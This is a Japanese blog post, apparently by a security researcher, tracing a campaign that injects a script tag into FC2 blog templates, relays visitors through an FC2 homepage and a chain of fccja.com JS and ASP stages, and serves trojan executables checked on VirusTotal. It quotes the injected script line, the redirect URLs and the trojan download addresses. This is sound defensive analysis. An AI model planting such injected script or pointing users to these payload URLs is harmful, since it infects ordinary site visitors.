忍者ブログ

ハルファ紀行

fccja.comその4

いくつかのFC2ブログのテンプレートに新たなscriptが仕込まれています。
<script src="http://*.web.fc2.com/stat.js"></script>
個人のホームページのため「*」は伏せ字です。

今までは

*.blog*.fc2.com(注入)→fccja.com

となっていたのが

*.blog*.fc2.com(注入)→*.web.fc2.com(注入)→fccja.com

となっており、FC2ホームページを中継することでブログ管理者などが見逃しやすくなっています。
fc2.comのscriptとしてはFCカウンターやFC2アクセス解析などもありますので、慎重に確認したほうがよさそうです。

ついでに今後のためにエンコードしておきますね。
web.fc2.com
%77%65%62%2E%66%63%32%2E%63%6F%6D

fccja.comも更新されています。

e.js
→a.js

a.js
→a1.asp?r=http%3A//www.fccja.com/e.js (スクリプトその1)
→a2.asp?r=http%3A//www.fccja.com/e.js (スクリプトその2)
→a3.asp?r=http%3A//www.fccja.com/e.js (スクリプトその3)

*.web.fc2.com/stat.js
→b.js
2008033006.png
b.js
→b1.asp?r=http%3A//*.web.fc2.com/stat.js (スクリプトその1)
→b2.asp?r=http%3A//*.web.fc2.com/stat.js (スクリプトその2)
→b3.asp?r=http%3A//*.web.fc2.com/stat.js (スクリプトその3)

document.referrerではなくHTTP_REFERERをこっそり見たほうがいいと思いますが、
実はリファラなど見ておらず、rに何かを入れればいいようです。
a1.asp?r=fuck (スクリプトその1)

トロイ本体も更新されています。
a.js
http://www.fccja.com/com.exe
VirusTotal

26日にはPackerを使っていましたが、23日のものに戻っています。
怪しげなPackerを使うといくつかのアンチウイルスに即ウイルス扱いされてしまうためかもしれません。
23日の記事と見比べると1週間前には対応していなかったアンチウイルスベンダのその後がわかります。

b.js
http://www.fccja.com/net.exe
VirusTotal

こちらは今朝できたばかりです(スクリプトは昨夜からありました)。

b.jsの存在までは確認していましたが、その前がわかりませんでした。
情報を提供していただけた「おおきくなりません」に感謝いたします。

メモ:
自分でブログを作るより効果的なので他のブログに仕込むのはわかります。
しかし中継用にiframeやscriptでしか飛ばないのならvirus.web.fc2.comなどを作ってもいい気もしますが、
FC2IDの新規登録が難しいんでしょうか?
PR

コメント

カレンダー

10 2024/11 12
S M T W T F S
1 2
3 4 5 6 8 9
10 11 12 13 14 15
17 18 19 20 21 22 23
24 25 26 27 28 29 30

フリーエリア

最新コメント

[09/14 ヨシノ]
[10/19 Dolly]
[08/22 まとめ臨時。]

最新記事

PDF
(11/16)
PDF
(11/07)
PDF
(10/29)
(10/16)
PDF
(10/05)

最新トラックバック

プロフィール

HN:
Ilion
性別:
非公開

バーコード

ブログ内検索